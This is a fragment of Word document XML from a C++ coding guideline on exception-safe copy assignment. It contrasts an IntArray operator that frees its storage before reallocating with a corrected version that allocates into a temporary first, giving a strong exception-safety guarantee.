                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>// nontrivial copy constructor</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F6609BC"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IntArray&amp; operator=(</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>IntArray &amp;rhs) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38905A7F"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>this</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>!= &amp;rhs) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14EC94E1"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>delete</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>[] array;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53182DF0"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array = nullptr;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61A744D9"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nElems = rhs.nElems;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="690931EA"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(nElems) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20CCCC3B"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array = </w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>[nElems];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BC3AE53"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std::</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>memcpy</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(array, rhs.array, nElems * </w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(*array));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D039D83"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EBE9211"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FF66A19"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>this</w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B510557"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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E46C6A6"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C3FCBD0" w14:textId="77777777" w:rsidR="0021682A"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>// ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="728394A2" w14:textId="0B740F7C" w:rsidR="00F72634" w:rsidRPr="0021682A" w:rsidRDefault="0021682A" w:rsidP="0021682A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0021682A">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>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305BF15" w:rsidR="00F72634" w:rsidRDefault="003A7CF9" w:rsidP="0015146B">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>The copy assignment operator provides a strong exception safety guarantee. The function allocates new storage for the copy before changing the object’s state. If the allocation succeeds, only then does the function change the state of the object.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="5DBE36E7" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="442F4B75"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;cstring&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="656EA3BD"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="608C7A80"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>class</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>IntArray {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08446F79"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b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>*array;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="447528CF"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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>size_t</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>nElems;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DAB5B59"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11DC507C"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8200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>// ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C084EC8"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75C32F29"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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>~IntArray() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BF5364C"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>delete</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>[] array;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6930EBEE"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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D80000"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D84C11D"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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>IntArray(</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>IntArray&amp; that); </w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>// nontrivial copy constructor</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28F14975"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B9BD1C3"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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>IntArray&amp; operator=(</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>IntArray &amp;rhs) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33CB11E3"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b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>*tmp = nullptr;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="107A0876"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(rhs.nElems) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34A345EC"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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>tmp = </w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>[rhs.nElems];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76BE4B45"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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>memcpy</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
